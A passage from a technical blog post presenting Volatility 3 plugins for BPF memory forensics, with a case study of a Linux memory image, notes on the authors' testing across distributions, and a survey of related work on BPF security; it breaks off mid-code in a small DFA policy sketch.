<p>Here, the <code class="language-plaintext highlighter-rouge">PROGS</code>, <code class="language-plaintext highlighter-rouge">MAPS</code>, and <code class="language-plaintext highlighter-rouge">LINKS</code> columns display the IDs of the respective objects. The list is generated by iterating over all file descriptors and the associated <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/fs.h#L940"><code class="language-plaintext highlighter-rouge">file</code></a> structures. BPF objects are identified by checking the file operations <code class="language-plaintext highlighter-rouge">f_op</code> pointer, and the corresponding <code class="language-plaintext highlighter-rouge">bpf_(prog|map|link)</code> structures are found by following the pointer stored in the <code class="language-plaintext highlighter-rouge">private_data</code> member.</p>
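<p><em>In pseudocode, the classification step might look like the following sketch. The <code class="language-plaintext highlighter-rouge">f_op</code> addresses here are placeholders; in reality they are resolved from the analyzed kernel's symbol table:</em></p>

```python
# Illustrative sketch: classify a process's file descriptors by their
# f_op pointer. The addresses below are placeholders standing in for the
# kernel symbols bpf_prog_fops, bpf_map_fops, and bpf_link_fops.
BPF_FOPS = {
    0xFFFFFFFF81A00000: "prog",  # placeholder for &bpf_prog_fops
    0xFFFFFFFF81A00100: "map",   # placeholder for &bpf_map_fops
    0xFFFFFFFF81A00200: "link",  # placeholder for &bpf_link_fops
}

def classify_fds(fd_table):
    """Map each fd to the kind of BPF object behind it.

    fd_table: dict fd -> f_op pointer value read from the file structure.
    Non-BPF files are skipped.
    """
    return {fd: BPF_FOPS[f_op] for fd, f_op in fd_table.items() if f_op in BPF_FOPS}
```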

<p>Not every BPF object is reachable from the process list, however. An object can, for example, also be represented as a file under the special <code class="language-plaintext highlighter-rouge">bpf</code> filesystem, which is usually mounted at <code class="language-plaintext highlighter-rouge">/sys/fs/bpf</code>, or a process can close its file descriptors and the object will remain alive as long as there are other references to it.</p>

<h3 id="connecting-the-dots">Connecting the Dots</h3>

<p>Finally, we would like to present the <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_graph.py"><code class="language-plaintext highlighter-rouge">bpf_graph</code></a> plugin, a meta-analysis that we have built on top of the four listing plugins. As its name suggests, its goal is to visualize the state of the BPF subsystem as a graph.</p>

<p>There are four types of nodes in this graph: programs, maps, links and processes. Different node types are distinguished by shape. Within a node type, the different program/map/link types are distinguished by color and process nodes are colored based on their process ID (PID). Furthermore, map and program nodes are labeled with the ID and name of the object, link nodes are labeled with the ID and attachment information of the link, and process nodes receive the PID and comm (name of the user-space program binary) of their process as labels.</p>

<p>There are three types of edges to establish relationships between nodes: file descriptor, link, and map. File descriptor edges are dotted and connect processes to BPF objects that they have an open fd for. Link edges are dashed and connect BPF links to the program they reference. Finally, map edges are drawn solid and connect maps to all of the programs that use them.</p>

<p>Especially for large applications with hundreds or even thousands of objects, it is essential to be able to filter the graph to make it useful. We have therefore implemented two additional options that can be passed to the plugin. First, you can pass a list of node types to include in the output. Second, you can pass a list of nodes, and only the connected components that contain at least one of those nodes will be drawn.</p>
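<p><em>The second filter amounts to a simple graph traversal. The following sketch uses a hypothetical adjacency-mapping representation, chosen for brevity; it is not the plugin's actual data structure:</em></p>

```python
# Sketch of the component filter: keep only the connected components that
# contain at least one of the wanted nodes. 'adj' maps each node to the
# set of its neighbours (hypothetical representation).
def filter_components(adj, wanted):
    keep = set()
    for start in wanted:
        if start not in adj or start in keep:
            continue
        stack = [start]  # depth-first walk of the component
        while stack:
            node = stack.pop()
            if node in keep:
                continue
            keep.add(node)
            stack.extend(adj[node])
    return keep
```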

<p>The idea of this plugin is to make the information of the four listing plugins more accessible to investigators by combining it into a single picture. This is especially useful for complex applications with possibly hundreds of programs and maps, or on busy systems where many different processes have loaded BPF programs.</p>

<p>Plugin output comes in two forms: a dot-format encoding of the graph, where each BPF object node carries metadata containing all of the plugin columns, and a picture of the graph, drawn with a default layout algorithm. The latter should suffice for most users, while the former enables advanced use cases that require further processing.</p>
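<p><em>A minimal version of the dot emission, using the edge styles described above, could look like the sketch below. The real plugin output additionally carries node shapes, colors, and per-node metadata:</em></p>

```python
# Minimal sketch of dot-format graph output with the three edge styles
# described above (dotted = file descriptor, dashed = link, solid = map).
EDGE_STYLE = {"fd": "dotted", "link": "dashed", "map": "solid"}

def to_dot(edges):
    """edges: iterable of (node_a, node_b, kind) triples."""
    lines = ["graph bpf {"]
    for a, b, kind in edges:
        lines.append(f'  "{a}" -- "{b}" [style={EDGE_STYLE[kind]}];')
    lines.append("}")
    return "\n".join(lines)
```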

<p><em>Note: We provide <a href="https://github.com/vobst/BPFVol3/tree/main/docs">standalone documentation</a> for all plugins in our project on GitHub.</em></p>

<h2 id="case-study">Case Study</h2>

<p>In this section we will use the plugins to examine the memory image of a system with a high level of BPF activity. To get a diverse set of small BPF applications, we launched the example programs that come with <a href="https://github.com/libbpf/libbpf-bootstrap">libbpf-bootstrap</a> and some of the kernel self-tests. You can download the <a href="https://drive.proton.me/urls/DBWB4GFRK8#7IbjrGRg6o5z">memory image</a> and <a href="https://drive.proton.me/urls/BCKSBBZ6Z4#ZeZcrnYlF7tZ">symbols</a> to follow along. If you prefer to analyze a single, large application, have a look at the <code class="language-plaintext highlighter-rouge">krie</code> example <a href="https://github.com/vobst/BPFVol3/blob/main/docs/examples/krie/krie.md">in our plugin documentation</a>.</p>

<p>A good first step is to use the graph plugin to get an overview of the subsystem (<code class="language-plaintext highlighter-rouge"># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_graph</code>).</p>

<p><img src="/media/bpf_memory_forensics_with_volatility_3/debian-bookworm-6.1.0-13-amd64_all.png" alt="debian-bookworm-6.1.0-13-amd64_all.png" /></p>

<p>As we can see, there are several components corresponding to different processes, each of which holds a number of BPF resources. Let us begin by examining the “Hello, World” example of BPF, the <a href="https://github.com/libbpf/libbpf-bootstrap/blob/master/examples/c/minimal.bpf.c"><code class="language-plaintext highlighter-rouge">minimal</code></a> program:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause</span>
<span class="cm">/* Copyright (c) 2020 Facebook */</span>
<span class="cp">#include</span> <span class="cpf">&lt;linux/bpf.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;bpf/bpf_helpers.h&gt;</span><span class="cp">
</span>
<span class="kt">char</span> <span class="n">LICENSE</span><span class="p">[]</span> <span class="n">SEC</span><span class="p">(</span><span class="s">"license"</span><span class="p">)</span> <span class="o">=</span> <span class="s">"Dual BSD/GPL"</span><span class="p">;</span>

<span class="kt">int</span> <span class="n">my_pid</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="n">SEC</span><span class="p">(</span><span class="s">"tp/syscalls/sys_enter_write"</span><span class="p">)</span>
<span class="kt">int</span> <span class="nf">handle_tp</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">ctx</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">bpf_get_current_pid_tgid</span><span class="p">()</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">!=</span> <span class="n">my_pid</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

	<span class="n">bpf_printk</span><span class="p">(</span><span class="s">"BPF triggered from PID %d.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span>

	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The above source code is compiled with clang to produce an ELF relocatable object file. It contains the BPF bytecode along with additional information: BTF sections, CORE relocations, programs as well as their attachment mechanisms and points, the maps that are used, and so on. This ELF is then embedded into a user-space program that statically links against libbpf. At runtime, it passes the ELF to libbpf, which takes care of all the relocations and kernel interactions required to wire the program up to the BPF VM.</p>
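<p><em>One detail of the source worth a note is the <code class="language-plaintext highlighter-rouge">pid = bpf_get_current_pid_tgid() &gt;&gt; 32</code> line: the helper packs the thread group ID (what user space calls the PID) into the upper 32 bits and the thread ID into the lower 32 bits. In Python terms:</em></p>

```python
def split_pid_tgid(packed):
    """bpf_get_current_pid_tgid() returns (tgid << 32) | tid, so the
    user-space notion of a PID lives in the upper 32 bits."""
    return packed >> 32, packed & 0xFFFFFFFF
```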

<p>With the above C code in the back of our minds, we can now have a look at the relevant component of the live system’s BPF object graph. To limit the output of the plugin to the connected components that contain certain nodes, we can add the <code class="language-plaintext highlighter-rouge">--components</code> flag to the invocation and give it a list of nodes (the format is <code class="language-plaintext highlighter-rouge">&lt;node_type&gt;-&lt;id&gt;</code> where <code class="language-plaintext highlighter-rouge">node_type</code> is in <code class="language-plaintext highlighter-rouge">{map,link,prog,proc}</code> and <code class="language-plaintext highlighter-rouge">id</code> is the BPF object ID or PID).</p>
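<p><em>Parsing such a node spec is straightforward; a sketch (not the plugin's actual parser):</em></p>

```python
# Sketch of parsing a --components node spec of the form '<node_type>-<id>'.
VALID_TYPES = {"map", "link", "prog", "proc"}

def parse_node_spec(spec):
    node_type, sep, node_id = spec.partition("-")
    if not sep or node_type not in VALID_TYPES or not node_id.isdigit():
        raise ValueError(f"malformed node spec: {spec!r}")
    return node_type, int(node_id)
```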

<p><img src="/media/bpf_memory_forensics_with_volatility_3/debian-bookworm-6.1.0-13-amd64_all_components_proc-695.png" alt="debian-bookworm-6.1.0-13-amd64_all_components_proc-695.png" /></p>

<p>As we can see, the ELF has caused libbpf to create a program, two maps and a link while loading. We can now use our plugins to gather more information about each object. Let’s start with the program itself.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listprogs --id 98 --dump-jited --dump-xlated
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    TAG     LOADED AT       MAP IDs BTF ID  HELPERS

0xbce500673000  98      TRACEPOINT      handle_tp       6a5dcef153b1001e        1417821088492   40,45   196     bpf_get_current_pid_tgid,bpf_trace_printk
</code></pre></div></div>

<p>By looking at the last column, we can see that it is indeed using two kernel helper functions, where the apparent call to <code class="language-plaintext highlighter-rouge">bpf_printk</code> turns out to be a macro that expands to <code class="language-plaintext highlighter-rouge">bpf_trace_printk</code>. If we look at the program bytecode and the machine code side by side, we can discover a few things.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># cat .prog_0xbce500673000_98_bdisasm
0x0: 85 00 00 00 10 b2 02 00                         call 0x2b210
0x8: 77 00 00 00 20 00 00 00                         rsh64 r0, 0x20
0x10: 18 01 00 00 00 a0 49 00 00 00 00 00 e5 bc ff ff lddw r1, 0xffffbce50049a000
0x20: 61 11 00 00 00 00 00 00                         ldxw r1, [r1]
0x28: 5d 01 05 00 00 00 00 00                         jne r1, r0, +0x5
0x30: 18 01 00 00 10 83 83 f5 00 00 00 00 7b 9b ff ff lddw r1, 0xffff9b7bf5838310
0x40: b7 02 00 00 1c 00 00 00                         mov64 r2, 0x1c
0x48: bf 03 00 00 00 00 00 00                         mov64 r3, r0
0x50: 85 00 00 00 80 0c ff ff                         call 0xffff0c80
0x58: b7 00 00 00 00 00 00 00                         mov64 r0, 0x0
0x60: 95 00 00 00 00 00 00 00                         exit 

# cat .prog_0xbce500673000_98_mdisasm

handle_tp:
 0xffffc03772a0: 0f 1f 44 00 00                               nop dword ptr [rax + rax]
 0xffffc03772a5: 66 90                                        nop
 0xffffc03772a7: 55                                           push rbp
 0xffffc03772a8: 48 89 e5                                     mov rbp, rsp
 0xffffc03772ab: e8 d0 fc aa f1                               call 0xffffb1e26f80       # bpf_get_current_pid_tgid
 0xffffc03772b0: 48 c1 e8 20                                  shr rax, 0x20
 0xffffc03772b4: 48 bf 00 a0 49 00 e5 bc ff ff                movabs rdi, 0xffffbce50049a000    # minimal_.bss + 0x110
 0xffffc03772be: 8b 7f 00                                     mov edi, dword ptr [rdi]
 0xffffc03772c1: 48 39 c7                                     cmp rdi, rax
 0xffffc03772c4: 75 17                                        jne 0xffffc03772dd        # handle_tp + 0x3d
 0xffffc03772c6: 48 bf 10 83 83 f5 7b 9b ff ff                movabs rdi, 0xffff9b7bf5838310    # minimal_.rodata + 0x110
 0xffffc03772d0: be 1c 00 00 00                               mov esi, 0x1c
 0xffffc03772d5: 48 89 c2                                     mov rdx, rax
 0xffffc03772d8: e8 13 57 a7 f1                               call 0xffffb1dec9f0       # bpf_trace_printk
 0xffffc03772dd: 31 c0                                        xor eax, eax
 0xffffc03772df: c9                                           leave
 0xffffc03772e0: c3                                           ret
 0xffffc03772e1: cc                                           int3
</code></pre></div></div>

<p>The first lesson here is probably that symbol annotations are useful :). As expected, when ignoring the prologue and epilogue inserted by the JIT compiler, the translation between BPF and x86_64 is essentially one-to-one. Furthermore, uses of global C variables like <code class="language-plaintext highlighter-rouge">my_pid</code> or the format string result in direct references to kernel memory, where the closest preceding symbols are the <code class="language-plaintext highlighter-rouge">minimal_.bss</code>’s and <code class="language-plaintext highlighter-rouge">minimal_.rodata</code>’s <code class="language-plaintext highlighter-rouge">bpf_map</code> structures, respectively. For simple array maps, the <code class="language-plaintext highlighter-rouge">bpf_map</code> structure resides at the beginning of a buffer that also holds the array data; <code class="language-plaintext highlighter-rouge">0x110</code> is simply the offset at which the map’s payload data starts. More generally, libbpf will automatically create maps to hold the variables living in the <code class="language-plaintext highlighter-rouge">.data</code>, <code class="language-plaintext highlighter-rouge">.rodata</code>, and <code class="language-plaintext highlighter-rouge">.bss</code> sections.</p>
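<p><em>The "closest preceding symbol" annotation seen in the disassembly can be reproduced with a binary search over a sorted symbol table. A sketch, using the <code class="language-plaintext highlighter-rouge">minimal_.bss</code> map offset reported by <code class="language-plaintext highlighter-rouge">bpf_listmaps</code> below (addresses truncated as in the plugin output):</em></p>

```python
import bisect

# Sorted (address, name) pairs; the single entry is the minimal_.bss
# bpf_map offset from the bpf_listmaps output in this post.
SYMBOLS = [(0xBCE500499EF0, "minimal_.bss")]

def symbolize(addr, symbols=SYMBOLS):
    """Annotate addr with the closest preceding symbol plus offset,
    like the '# minimal_.bss + 0x110' comments in the disassembly."""
    addrs = [a for a, _ in symbols]
    i = bisect.bisect_right(addrs, addr) - 1
    if i < 0:
        return hex(addr)  # no known symbol precedes this address
    base, name = symbols[i]
    off = addr - base
    return name if off == 0 else f"{name} + {off:#x}"
```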

<p>Dumping the map contents confirms that the <code class="language-plaintext highlighter-rouge">.bss</code> map holds the <code class="language-plaintext highlighter-rouge">minimal</code> process’s PID while the <code class="language-plaintext highlighter-rouge">.rodata</code> map contains the format string.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listmaps --id 45 40 --dump
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    KEY SIZE        VALUE SIZE      MAX ENTRIES

0xbce500499ef0  40      ARRAY   minimal_.bss    4       4       1
0x9b7bf5838200  45      ARRAY   minimal_.rodata 4       28      1
# cat .map_0xbce500499ef0_40
{"0": "section (.bss) = {\n (my_pid) (int) b'\\xb7\\x02\\x00\\x00'\n"}
# cat .map_0x9b7bf5838200_45
{"0": "section (.rodata) = {\n (handle_tp.____fmt) b'BPF triggered from PID %d.\\n\\x00'\n"}
</code></pre></div></div>

<p>In the source code we saw the directive <code class="language-plaintext highlighter-rouge">SEC("tp/syscalls/sys_enter_write")</code>, which instructs the compiler to place the <code class="language-plaintext highlighter-rouge">handle_tp</code> function’s BPF bytecode in an ELF section called <code class="language-plaintext highlighter-rouge">"tp/syscalls/sys_enter_write"</code>. While loading, libbpf picks this up and creates a link that attaches the program to a perf event that is activated by the <code class="language-plaintext highlighter-rouge">sys_enter_write</code> tracepoint. We can inspect the link, but getting more information about the corresponding tracepoint is not yet implemented. Contributions are always highly welcome :)</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listlinks --id 11
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    PROG    ATTACH

0x9b7bc2c09ae0  11      PERF_EVENT      98
</code></pre></div></div>

<p>Dissecting the “Hello, World” program was useful to get an impression of what a BPF application looks like at runtime. Before concluding this section, we will have a look at a less minimalist example, the process with PID 687.</p>

<p><img src="/media/bpf_memory_forensics_with_volatility_3/debian-bookworm-6.1.0-13-amd64_all_components_proc-687.png" alt="debian-bookworm-6.1.0-13-amd64_all_components_proc-687.png" /></p>

<p>This process is one of the kernel self-tests. It tests a BPF feature that allows new function pointer tables used for dynamic dispatch (so-called structure operations) to be loaded at runtime, with the individual operations implemented as BPF programs. The programs that implement the new operations can be recognized by their type <code class="language-plaintext highlighter-rouge">STRUCT_OPS</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listprogs --id 37 39 40 42 43 44 45
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    TAG     LOADED AT       MAP IDs BTF ID  HELPERS

0xbce5003b7000  37      STRUCT_OPS      dctcp_init      562160e42a59841c        1417427431243   9,10,7  124     bpf_sk_storage_get,bpf_sk_storage_delete
0xbce50046b000  39      STRUCT_OPS      dctcp_ssthresh  cddbf7f9cf9b52d7        1417427590219   9       124
0xbce500473000  40      STRUCT_OPS      dctcp_update_alpha      6e84698df8007e42        1417427647277   9       124
0xbce500487000  42      STRUCT_OPS      dctcp_state     dc878de7981c438b        1417427777414   9       124
0xbce500493000  43      STRUCT_OPS      dctcp_cwnd_event        70cbe888b7ece66f        1417427888091   9       124     bpf_tcp_send_ack
0xbce5004e5000  44      STRUCT_OPS      dctcp_cwnd_undo 78b977678332d89f        1417428066805   9       124
0xbce5004eb000  45      STRUCT_OPS      dctcp_cong_avoid        20ff0d9ab24c8843        1417428109672   9       124     tcp_reno_cong_avoid
</code></pre></div></div>

<p>The mapping between the programs and the function pointer table they implement is realized through a special map of type <code class="language-plaintext highlighter-rouge">STRUCT_OPS</code> created by the process.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listmaps --id 11 12
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    KEY SIZE        VALUE SIZE      MAX ENTRIES

0x9b7bc3c41000  11      STRUCT_OPS      dctcp_nouse     4       256     1
0x9b7bc3c43400  12      STRUCT_OPS      dctcp   4       256     1

</code></pre></div></div>

<p>Unfortunately, the current implementation does not parse the contents of the map, so it cannot determine the name of the kernel structure being implemented and the mapping between its member functions and the BPF programs. As always, contributions are highly welcome :). In this case, we would find out that it implements <a href="https://elixir.bootlin.com/linux/v6.1.65/source/include/net/tcp.h#L1071"><code class="language-plaintext highlighter-rouge">tcp_congestion_ops</code></a> to load a new TCP congestion control algorithm on the fly.</p>

<p>There is a lot more to explore in this memory image, so feel free to have a closer look at the other processes. You might also want to check out the <code class="language-plaintext highlighter-rouge">krie</code> example in <a href="https://github.com/vobst/BPFVol3/blob/main/docs/examples/krie/krie.md"><code class="language-plaintext highlighter-rouge">our documentation</code></a> to get an impression of a larger BPF application.</p>

<h2 id="testing">Testing</h2>

<p>We tested the plugins on memory images acquired from virtual machines running on QEMU/KVM that were suspended for the duration of the acquisition process. To ensure the correctness of all plugin results, we have cross-checked them by debugging the guest kernel as well as comparing them with <code class="language-plaintext highlighter-rouge">bpftool</code> running on the guest.</p>

<p>Below is a list of the distributions and releases that we used for manual testing:</p>

<p><strong>Debian</strong></p>
<ul>
  <li>12.2.0-14, Linux 6.1.0-13</li>
</ul>

<p><strong>Ubuntu</strong></p>
<ul>
  <li>22.04.2, Linux 5.15.0-89-generic</li>
  <li>20.04, Linux 5.4.0-26-generic</li>
</ul>

<p><strong>Custom</strong></p>
<ul>
  <li>Linux 6.0.12, various configurations</li>
  <li>Linux 6.2.12, various configurations</li>
</ul>

<p>For each of these kernels, we tested at least all the plugins on an image taken during the execution of the libbpf-bootstrap example programs.</p>

<p>In addition to the manual tests on the kernels mentioned above, we also developed an evaluation framework (the code is not public). The framework is based on <a href="https://www.vagrantup.com/">Vagrant</a> and <a href="https://libvirt.org/">libvirt</a>/<a href="https://linux-kvm.org/page/Main_Page">KVM</a>. First, we create and update all VMs. After that, we run programs from <code class="language-plaintext highlighter-rouge">libbpf-bootstrap</code> with <code class="language-plaintext highlighter-rouge">nohup</code> so that we can leave the VM and dump the memory from the outside. To dump the memory we use <code class="language-plaintext highlighter-rouge">virsh</code> with <code class="language-plaintext highlighter-rouge">virsh dump &lt;name of VM&gt; --memory-only</code>; <code class="language-plaintext highlighter-rouge">virsh dump</code> pauses the VM for a clean acquisition of the main memory. We also install debug symbols for all the Linux distributions under investigation so that we can gather the debug kernels (<code class="language-plaintext highlighter-rouge">vmlinux</code> with DWARF debugging information) and the <code class="language-plaintext highlighter-rouge">System.map</code> file. We then feed both files to <a href="https://github.com/volatilityfoundation/dwarf2json"><code class="language-plaintext highlighter-rouge">dwarf2json</code></a> to generate the ISF information that Volatility 3 needs. So far, we have tested the following Linux distributions with their respective kernels:</p>

<ul>
  <li>Alma Linux 9 - Linux kernel 5.14.0-362.8.1.el9_3.x86_64 ✅</li>
  <li>Fedora 38 - Linux kernel 6.6.6-100.fc38.x86_64 ✅</li>
  <li>Fedora 39 - Linux kernel 6.6.6-200.fc39.x86_64 ✅</li>
  <li>CentOS Stream 9 - Linux kernel 5.14.0-391.el9.x86_64 ✅</li>
  <li>Rocky Linux 8 - Linux kernel 4.18.0-513.9.1.el8_9.x86_64 ✅</li>
  <li>Rocky Linux 9 - 🪲 <code class="language-plaintext highlighter-rouge">kernel-debuginfo-common</code> package is missing so the kernel debugging symbols cannot be installed (<a href="https://download.rockylinux.org/pub/rocky/9/BaseOS/x86_64/debug/tree/Packages/k/">list of packages</a>)</li>
  <li>Debian 11 - Linux kernel 5.10.0-26-amd64 ✅</li>
  <li>Debian 12 - Linux kernel 6.1.0-13-amd64 ✅</li>
  <li>Ubuntu 22.04 - Linux kernel 5.15.0-88-generic ✅</li>
  <li>Ubuntu 23.10 - Linux kernel 6.5.0-10-generic ✅ (works partially, but process listing is broken due to this <a href="https://github.com/volatilityfoundation/dwarf2json/issues/57">dwarf2json GitHub Issue</a>)</li>
  <li>ArchLinux - Linux kernel 6.6.7-arch1-1 ✅ (works partially, but breaks probably due to the same issue as <a href="https://github.com/volatilityfoundation/volatility3/issues/1065">volatility3/dwarf2json GitHub Issue</a>)</li>
  <li>openSUSE Tumbleweed - 🪲 we currently did not find the debugging symbols in the debugging kernel (<a href="https://bugzilla.opensuse.org/show_bug.cgi?id=1218163">openSUSE Bugzilla</a>)</li>
</ul>

<p>We will check whether these problems get resolved and re-evaluate our plugins accordingly. Generally, our framework is designed to support additional distributions as well, and we will try to evaluate the plugins on a wider variety of them.</p>

<p>During our automated analysis we encountered an interesting problem. To collect the kernels with debugging symbols from the VMs, we need to copy them to the host. When the kernel executable file is copied, it is read into main memory by the kernel’s page cache mechanism. This implies that parts of the kernel file (vmlinux), in addition to the running kernel itself, may be present in the dump. As a consequence, the Volatility 3 function <code class="language-plaintext highlighter-rouge">find_aslr</code> (<a href="https://github.com/volatilityfoundation/volatility3/blob/fdf93f502fa8d0edc2b60764463aee3c455aeb03/volatility3/framework/automagic/linux.py#L121">source code</a>) may first find matches in the page-cached kernel file (vmlinux) rather than in the running kernel. An issue has been opened <a href="https://github.com/volatilityfoundation/volatility3/pull/1070">here</a>.</p>

<h2 id="related-work">Related Work</h2>

<p>There are several articles on BPF that cover different security-related aspects of the subsystem. In this section, we will briefly discuss the ones that are most relevant to the presented work.</p>

<p><strong>Memory Forensics</strong>: The <a href="https://github.com/crash-utility/crash/tree/master"><code class="language-plaintext highlighter-rouge">crash</code></a> utility, which is used to analyze live systems or kernel core dumps, has a <a href="https://github.com/crash-utility/crash/blob/master/bpf.c"><code class="language-plaintext highlighter-rouge">bpf</code> subcommand</a> that can be used to display information about BPF maps and programs. However, as it is not a forensics tool, it relies solely on the information obtained via the <code class="language-plaintext highlighter-rouge">prog_idr</code> and <code class="language-plaintext highlighter-rouge">map_idr</code>. Similarly, the <a href="https://github.com/osandov/drgn"><code class="language-plaintext highlighter-rouge">drgn</code></a> programmable debugger comes with a <a href="https://github.com/osandov/drgn/blob/main/tools/bpf_inspect.py">script</a> to list BPF programs and maps but suffers from the same problems when it comes to anti-forensic techniques. Furthermore, <code class="language-plaintext highlighter-rouge">drgn</code> and <code class="language-plaintext highlighter-rouge">crash</code> are primarily known as debugging tools for systems developers and as such are not necessarily well-established in the digital forensics and incident response (DFIR) community. In contrast, we implemented our analyses as plugins for the popular Volatility framework, which is well-known in the DFIR community. Finally, A. Case and G. Richard presented Volatility plugins for investigating the Linux tracing infrastructure in their <a href="https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Fixing-A-Memory-Forensics-Blind-Spot-Linux-Kernel-Tracing-wp.pdf">BlackHat US 2021 paper</a>. Apart from a plugin that lists programs by parsing the <code class="language-plaintext highlighter-rouge">prog_idr</code>, they also implemented several plugins that can find BPF programs by analyzing the data structures of the attachment mechanisms they use, such as kprobes, tracepoints, or perf events. Thus, their plugins are also able to discover inconsistencies that could reveal anti-forensic tampering. However, they have never publicly released their plugins, and despite several attempts we have been unable to contact the authors to obtain a copy of the source code. Volatility already supports detecting BPF programs attached to sockets in its <a href="https://github.com/volatilityfoundation/volatility3/blame/develop/volatility3/framework/plugins/linux/sockstat.py#L163"><code class="language-plaintext highlighter-rouge">sockstat</code></a> plugin, but the displayed information is limited to names and IDs.</p>

<p><strong>Reverse Engineering</strong>: Reverse engineering BPF programs is a key step while triaging the findings of our plugins. Recently, the <a href="https://github.com/NationalSecurityAgency/ghidra">Ghidra</a> software reverse engineering (SRE) suite gained <a href="https://github.com/NationalSecurityAgency/ghidra/pull/4258">support for the BPF architecture</a>, which means that its powerful decompiler can be used to analyze BPF bytecode extracted from kernel memory or user-space programs. Furthermore, BPF bytecode is oftentimes embedded into user-space programs that use framework libraries to load it into the kernel at runtime. For programs written in the Go programming language, <a href="https://github.com/Gui774ume/ebpfkit-monitor">ebpfkit-monitor</a> can parse the binary format of these embedded files to list the defined programs and maps as well as their interactions. It uses this information to generate graphs that are similar to those of our <code class="language-plaintext highlighter-rouge">bpf_graph</code> plugin. Although the utility of these graphs has inspired our plugin, it is fundamentally different in that it displays information about the state of the kernel’s BPF subsystem extracted from a memory image. Consequently, it is inherently agnostic to the user-space framework that was used for compiling and loading the programs. Additionally, it displays the actual state of the BPF subsystem instead of the BPF objects that might be created by an executable at runtime.</p>

<p><strong>Runtime Protection and Monitoring</strong>: Important aspects of countering BPF malware are preventing attackers from loading malicious BPF programs and logging suspicious events for later review. <a href="https://github.com/Gui774ume/krie">krie</a> and <a href="https://github.com/Gui774ume/ebpfkit-monitor">ebpfkit-monitor</a> are tools that can be used to log BPF-related events as well as to deny processes access to the BPF system call.</p>

<p>Simply blocking access on a per-process basis is too coarse-grained for many applications, and thus <a href="https://medium.com/@yunwei356/the-secure-path-forward-for-ebpf-runtime-challenges-and-innovations-968f9d71fc16">multiple approaches have been proposed</a> to implement a more fine-grained access control model for the BPF subsystem to facilitate the realization of least-privilege policies. Among those, one can further distinguish between proposals that implement access control in user space, kernel space, or a hypervisor.</p>

<p><a href="https://bpfman.io/main/"><code class="language-plaintext highlighter-rouge">bpfman</code></a> (formerly known as bpfd) is a privileged user space daemon that acts as a proxy for loading BPF programs and can be used to implement different access control policies. A combination of a privileged user-space daemon and kernel changes is used in the proposed <a href="https://lwn.net/Articles/947173/">BPF token approach</a>, which allows a privileged daemon to delegate access to specific parts of the BPF subsystem to container processes.</p>

<p>Fine-grained in-kernel access control is offered by the <a href="https://dl.acm.org/doi/abs/10.5555/3620237.3620571">CapBits</a> proposed by Yi He et al. Here, two bitfields are added to the <code class="language-plaintext highlighter-rouge">task_struct</code>: one defines the access that a process has to the BPF subsystem, e.g., allowed program types and helpers, while the other restricts the access that BPF programs have to the process, e.g., to prevent it from being traced by kprobe programs. Namespaces are already used in many areas of the Linux kernel to virtualize global resources like PIDs or network devices. Thus, Y. <a href="https://lwn.net/Articles/927354/">Shao proposed introducing BPF namespaces</a> to limit the scope of loaded programs to processes inside of the namespace. Finally, <a href="https://www.youtube.com/watch?v=9p4qviq60z8">signatures over programs</a> are a mechanism that allows the kernel to verify their provenance, analogous to the module signatures that prevent attackers from loading malicious kernel modules.</p>

<p>Lastly, Y. Wang et al. <a href="https://dl.acm.org/doi/10.1145/3609021.3609305">proposed</a> moving large parts of the BPF VM from the kernel into a hypervisor, where they implement a multi-step verification process that includes enforcing a security policy, checking signatures, and scanning for known malicious programs. In the security policy, allowed programs can be specified as a set of deterministic finite automata, which makes it possible to accept dynamically generated programs without permitting arbitrary code to be loaded.</p>
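<p>To illustrate the idea (this is a toy sketch, not the authors’ implementation; the policy and opcode classes are hypothetical), a DFA over instruction classes can accept an open-ended family of generated programs while rejecting everything outside its language:</p>

```python
# Toy DFA policy: accept programs of the form "any number of ALU ops
# followed by a single exit". Dynamically generated programs pass as long
# as they stay within the automaton's language.
ACCEPT = "accept"
TRANSITIONS = {
    ("start", "alu"): "start",
    ("start", "exit"): ACCEPT,
}

def allowed(opcodes):
    state = "start"
    for op in opcodes:
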